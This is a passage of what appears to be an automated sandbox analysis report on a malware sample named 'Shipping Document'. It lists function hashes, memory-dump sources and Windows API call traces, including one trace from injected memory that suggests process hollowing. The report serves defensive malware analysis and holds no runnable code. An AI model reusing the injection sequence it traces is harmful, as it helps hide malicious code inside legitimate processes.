                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: IconNotifyShell_$_memset
                              • String ID:
                              • API String ID: 1505330794-0
                              • Opcode ID: 926db12962b37474f17e24de2e767777cae642431f924951a0a28c3a15aa453e
                              • Instruction ID: b18275480cbe878894999ce26db97c6c7f1c73922c0e10c9478cf288a4ea6092
                              • Opcode Fuzzy Hash: 926db12962b37474f17e24de2e767777cae642431f924951a0a28c3a15aa453e
                              • Instruction Fuzzy Hash: E73181B19087028FD724DF24D595B9BBBE8FB48314F10092EE9DAC7240D77AA948DB52
                              APIs
                              • __FF_MSGBANNER.LIBCMT ref: 00FE5963
                                • Part of subcall function 00FEA3AB: __NMSG_WRITE.LIBCMT ref: 00FEA3D2
                                • Part of subcall function 00FEA3AB: __NMSG_WRITE.LIBCMT ref: 00FEA3DC
                              • __NMSG_WRITE.LIBCMT ref: 00FE596A
                                • Part of subcall function 00FEA408: GetModuleFileNameW.KERNEL32(00000000,010843BA,00000104,?,00000001,00000000), ref: 00FEA49A
                                • Part of subcall function 00FEA408: ___crtMessageBoxW.LIBCMT ref: 00FEA548
                                • Part of subcall function 00FE32DF: ___crtCorExitProcess.LIBCMT ref: 00FE32E5
                                • Part of subcall function 00FE32DF: ExitProcess.KERNEL32 ref: 00FE32EE
                                • Part of subcall function 00FE8D68: __getptd_noexit.LIBCMT ref: 00FE8D68
                              • RtlAllocateHeap.NTDLL(011C0000,00000000,00000001,00000000,?,?,?,00FE1013,?), ref: 00FE598F
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                              • String ID:
                              • API String ID: 1372826849-0
                              • Opcode ID: 33dde4e94fe22dc4ed22ea4c643a701e2fde8de97ba12c6ef29eab8d76e1a746
                              • Instruction ID: 741993b4b8af1e8693950498cebf28ca4aac03783e8a661a6ad2327e8df99c17
                              • Opcode Fuzzy Hash: 33dde4e94fe22dc4ed22ea4c643a701e2fde8de97ba12c6ef29eab8d76e1a746
                              • Instruction Fuzzy Hash: E701F532604B96DEE6313B67DC46BAD72988F42F78F50002AF444EB2C2DE799D01B365
                              APIs
                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,010297D2,?,?,?,?,?,00000004), ref: 01029B45
                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,010297D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 01029B5B
                              • CloseHandle.KERNEL32(00000000,?,010297D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 01029B62
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: File$CloseCreateHandleTime
                              • String ID:
                              • API String ID: 3397143404-0
                              • Opcode ID: c6a035ff35c1ce27369fbed9d2d75ff67f77e5327293b1935d2e74aaa4a0ebb9
                              • Instruction ID: 458573ec4f9c95db11f1bb362fd686251be51e6ca3db2884bca8c4b1f083baa4
                              • Opcode Fuzzy Hash: c6a035ff35c1ce27369fbed9d2d75ff67f77e5327293b1935d2e74aaa4a0ebb9
                              • Instruction Fuzzy Hash: 77E08636180225B7EB311A58ED49FCA7F58AB06B65F108110FB94690E087B625119798
                              APIs
                              • _free.LIBCMT ref: 01028FA5
                                • Part of subcall function 00FE2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00FE9C64), ref: 00FE2FA9
                                • Part of subcall function 00FE2F95: GetLastError.KERNEL32(00000000,?,00FE9C64), ref: 00FE2FBB
                              • _free.LIBCMT ref: 01028FB6
                              • _free.LIBCMT ref: 01028FC8
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: 7d3b2028e624efae88516297b2f19128b0b5a47fb3bf7ffb404a5919715f4e12
                              • Instruction ID: 7544be8e301855afb99a78005edff81b99916fbf03bedbea9a1562e5c53cca6b
                              • Opcode Fuzzy Hash: 7d3b2028e624efae88516297b2f19128b0b5a47fb3bf7ffb404a5919715f4e12
                              • Instruction Fuzzy Hash: 14E0C2A13087904AEAE4A5BDAD00E832BEE0F48211708084FF649DB142EE28E4419024
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID:
                              • String ID: CALL
                              • API String ID: 0-4196123274
                              • Opcode ID: 08666f8dd045df0155e62b2accf0a0ae7bb84822764719e6270f4e58f2afb54c
                              • Instruction ID: 3282dafb19a4cf38a3b30b1aa95c3b47e56eb2e16c4bedfde6ca09c8af5e95e4
                              • Opcode Fuzzy Hash: 08666f8dd045df0155e62b2accf0a0ae7bb84822764719e6270f4e58f2afb54c
                              • Instruction Fuzzy Hash: 39226874508346CFD724DF14C996F6ABBE1BF84304F14895DE8868B262DB35EC81EB82
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: EA06
                              • API String ID: 4104443479-3962188686
                              • Opcode ID: 97afe06b075c5eb1b7e09d86143ee5fcfb6c1a93c5f9b882e19db317a5b30f9f
                              • Instruction ID: 208bb2447c663bc00762e67ede4b169b6d0280927e29cbfeeb86f88bf7d4d2d0
                              • Opcode Fuzzy Hash: 97afe06b075c5eb1b7e09d86143ee5fcfb6c1a93c5f9b882e19db317a5b30f9f
                              • Instruction Fuzzy Hash: FF415E32E041565BDF219B648E73FBE7F66AB41310F19406DEC82DB182C525BD84B3A1
                              APIs
                              • IsThemeActive.UXTHEME ref: 00FC4992
                                • Part of subcall function 00FE35AC: __lock.LIBCMT ref: 00FE35B2
                                • Part of subcall function 00FE35AC: DecodePointer.KERNEL32(00000001,?,00FC49A7,010181BC), ref: 00FE35BE
                                • Part of subcall function 00FE35AC: EncodePointer.KERNEL32(?,?,00FC49A7,010181BC), ref: 00FE35C9
                                • Part of subcall function 00FC4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00FC4A73
                                • Part of subcall function 00FC4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FC4A88
                                • Part of subcall function 00FC3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FC3B7A
                                • Part of subcall function 00FC3B4C: IsDebuggerPresent.KERNEL32 ref: 00FC3B8C
                                • Part of subcall function 00FC3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,010862F8,010862E0,?,?), ref: 00FC3BFD
                                • Part of subcall function 00FC3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00FC3C81
                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FC49D2
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                              • String ID:
                              • API String ID: 1438897964-0
                              • Opcode ID: 72f8ec42bb3368ea17f27a090b10f9c4be89d524b759ca46ef3138f84441f429
                              • Instruction ID: 21c2af2e256dd0d1b67f72190dd14d91393fbede4af31a6c4f358df3f33cc44b
                              • Opcode Fuzzy Hash: 72f8ec42bb3368ea17f27a090b10f9c4be89d524b759ca46ef3138f84441f429
                              • Instruction Fuzzy Hash: 08118E719187129BC310DF29D94AE0EFBE8EB94710F00451EF4C5872A5DBBA9544DB92
                              APIs
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00FC5981,?,?,?,?), ref: 00FC5E27
                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00FC5981,?,?,?,?), ref: 00FFE19C
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 33486ab3345960c05a6ec8692f72226ac9958e06dac5eb079a38bf389abc6520
                              • Instruction ID: 84d18bd1ac8362775e5fb2b518be7597c9f8310cca86081aed6e0a5fca63085a
                              • Opcode Fuzzy Hash: 33486ab3345960c05a6ec8692f72226ac9958e06dac5eb079a38bf389abc6520
                              • Instruction Fuzzy Hash: 6401B571644709BFF3240E29CD8BF763B9CEB01B78F108319BAE55A1E0C6B42E859B50
                              APIs
                                • Part of subcall function 00FE594C: __FF_MSGBANNER.LIBCMT ref: 00FE5963
                                • Part of subcall function 00FE594C: __NMSG_WRITE.LIBCMT ref: 00FE596A
                                • Part of subcall function 00FE594C: RtlAllocateHeap.NTDLL(011C0000,00000000,00000001,00000000,?,?,?,00FE1013,?), ref: 00FE598F
                              • std::exception::exception.LIBCMT ref: 00FE102C
                              • __CxxThrowException@8.LIBCMT ref: 00FE1041
                                • Part of subcall function 00FE87DB: RaiseException.KERNEL32(?,?,?,0107BAF8,00000000,?,?,?,?,00FE1046,?,0107BAF8,?,00000001), ref: 00FE8830
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                              • String ID:
                              • API String ID: 3902256705-0
                              • Opcode ID: 582fa1a0961200b0494ce8bac776f90a947362a6afb84a695a0a1c0a2388e5be
                              • Instruction ID: 026f9370e835f24a7cd2fbd39b19f0a4dbe5c7d40804ec36e918eb6c1aa66df7
                              • Opcode Fuzzy Hash: 582fa1a0961200b0494ce8bac776f90a947362a6afb84a695a0a1c0a2388e5be
                              • Instruction Fuzzy Hash: 76F0C8359003DDA6CB24BA5BEC159DF7BACAF01361F100426FD08A6691DF758EC1A2E5
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: __lock_file_memset
                              • String ID:
                              • API String ID: 26237723-0
                              • Opcode ID: 400d98256557c873ff2c5191cda19c0271313d591977ff5073eb37f24ad8eb01
                              • Instruction ID: dd8c69ca46f146b3a0a1d9a48875774332dff531823be39d04b39107afc3002b
                              • Opcode Fuzzy Hash: 400d98256557c873ff2c5191cda19c0271313d591977ff5073eb37f24ad8eb01
                              • Instruction Fuzzy Hash: 9501AC71C01689EBCF11BF678C0559F7B61AF807A4F144215F8245B161DB35CB12FB51
                              APIs
                                • Part of subcall function 00FE8D68: __getptd_noexit.LIBCMT ref: 00FE8D68
                              • __lock_file.LIBCMT ref: 00FE561B
                                • Part of subcall function 00FE6E4E: __lock.LIBCMT ref: 00FE6E71
                              • __fclose_nolock.LIBCMT ref: 00FE5626
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                              • String ID:
                              • API String ID: 2800547568-0
                              • Opcode ID: 84f3bd9e84f476ae0f533e076ca0548fd1a36ec49c2c03e2b7e77798d58e281f
                              • Instruction ID: b20910914a39f2b3d17e9706fc6a49a500a9ea1d7aefae49b35bfdedf43b21a3
                              • Opcode Fuzzy Hash: 84f3bd9e84f476ae0f533e076ca0548fd1a36ec49c2c03e2b7e77798d58e281f
                              • Instruction Fuzzy Hash: 49F09072C00A859ADB20BB778C0276E77A16F40B78F558209E428AB1C1CF7C8902BB55
                              APIs
                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,00FC558F,?,?,?,?,?), ref: 00FC81DA
                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,00FC558F,?,?,?,?,?), ref: 00FC820D
                                • Part of subcall function 00FC78AD: _memmove.LIBCMT ref: 00FC78E9
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ByteCharMultiWide$_memmove
                              • String ID:
                              • API String ID: 3033907384-0
                              • Opcode ID: d84f7b2b0a0471781caf2b474731848cb86acee9e67be2dd982573fa183d0f4e
                              • Instruction ID: 79c591df5ef61c4e55a787d7c0a0b506a62be1318a3e0e1d0302fb6f61beec27
                              • Opcode Fuzzy Hash: d84f7b2b0a0471781caf2b474731848cb86acee9e67be2dd982573fa183d0f4e
                              • Instruction Fuzzy Hash: 7501A2752012057FEB247A26DE4BFBB3B5CEB85760F10802AFD05CD190DE71D800A671
                              APIs
                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01E51ABB
                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01E51B51
                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01E51B73
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516553081.0000000001E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_1e50000_Shipping Document.jbxd
                              Similarity
                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                              • String ID:
                              • API String ID: 2438371351-0
                              • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                              • Instruction ID: b58de5c9cbf9604d9aaa90bfe807ccf94b4499f6f5b58a9717e2bcfe6f91cd6e
                              • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                              • Instruction Fuzzy Hash: 5C12EF24E14658C6EB24DF64D8507DEB232EF68300F10A0E9910DEB7A5E77A4F81CF5A
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d5ad5e6f03d8f7f7ad5fd48d52440aa2eaf0d4bbdb2ca877332fd0513c8bc21d
                              • Instruction ID: c3c389e3f7bf10b0b3dcdaccade73edf0c1865d9e9124b0561d684e9fc0bd1d5
                              • Opcode Fuzzy Hash: d5ad5e6f03d8f7f7ad5fd48d52440aa2eaf0d4bbdb2ca877332fd0513c8bc21d
                              • Instruction Fuzzy Hash: B3618A71A0020A9FDB14DF24CA82FAAB7E6EF44310F14847DEA4A87281D775ED59DB50
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6743b4dac1821ee22af6390e2a51f4fc40dbe6590397980be479ce2395e9d8b4
                              • Instruction ID: 6a67f3f21d65afa720bae448311b13112eb1a2ab7a66186c2d50c71255843cb8
                              • Opcode Fuzzy Hash: 6743b4dac1821ee22af6390e2a51f4fc40dbe6590397980be479ce2395e9d8b4
                              • Instruction Fuzzy Hash: 9D51D531600205AFDF15EB58CD92FAE77E6AF85710F188099F9469B382CB35ED40EB51
                              APIs
                              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00FC5CF6
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: FilePointer
                              • String ID:
                              • API String ID: 973152223-0
                              • Opcode ID: 0edd0e5ed245885d53fc7786f09bd694f9fc12f27fed18987782f4db9a1264fc
                              • Instruction ID: e250512d6f74980b867d2f30c543c9a02284e543238830f07a1208fba834ed3e
                              • Opcode Fuzzy Hash: 0edd0e5ed245885d53fc7786f09bd694f9fc12f27fed18987782f4db9a1264fc
                              • Instruction Fuzzy Hash: A3316D71A00B0AAFCB18CF6DC585B6DB7B1FF48720F148619D81A93710D771B9A0EB90
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ClearVariant
                              • String ID:
                              • API String ID: 1473721057-0
                              • Opcode ID: 9920e8a97ed0f5c0b51a3462e4e3426732d3a027313c3878e3dafd7b0ffaf7aa
                              • Instruction ID: 537438aa2eb644e2613f50172a86da0e3d8f775fed40455e92e95ed8daa00d4f
                              • Opcode Fuzzy Hash: 9920e8a97ed0f5c0b51a3462e4e3426732d3a027313c3878e3dafd7b0ffaf7aa
                              • Instruction Fuzzy Hash: F8412774908342CFDB25DF19C585F1ABBE0BF45318F09889CE98A4B762C736E845DB52
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID:
                              • API String ID: 4104443479-0
                              • Opcode ID: 3736cafb92991f82614a90cedb94287a222d50c6183b1c15e27c2f4af532f354
                              • Instruction ID: 8f0c3622009c4d7e3cab60632eff58d9cb670162031df006bcdf3298995ce9d3
                              • Opcode Fuzzy Hash: 3736cafb92991f82614a90cedb94287a222d50c6183b1c15e27c2f4af532f354
                              • Instruction Fuzzy Hash: 05210531A00A0DEBDB205F12E885B7A7FB8FF40740F21846EE686D1124EF7694E0A751
                              APIs
                                • Part of subcall function 00FC4D13: FreeLibrary.KERNEL32(00000000,?), ref: 00FC4D4D
                                • Part of subcall function 00FE548B: __wfsopen.LIBCMT ref: 00FE5496
                              • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,010862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FC4F6F
                                • Part of subcall function 00FC4CC8: FreeLibrary.KERNEL32(00000000), ref: 00FC4D02
                                • Part of subcall function 00FC4DD0: _memmove.LIBCMT ref: 00FC4E1A
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
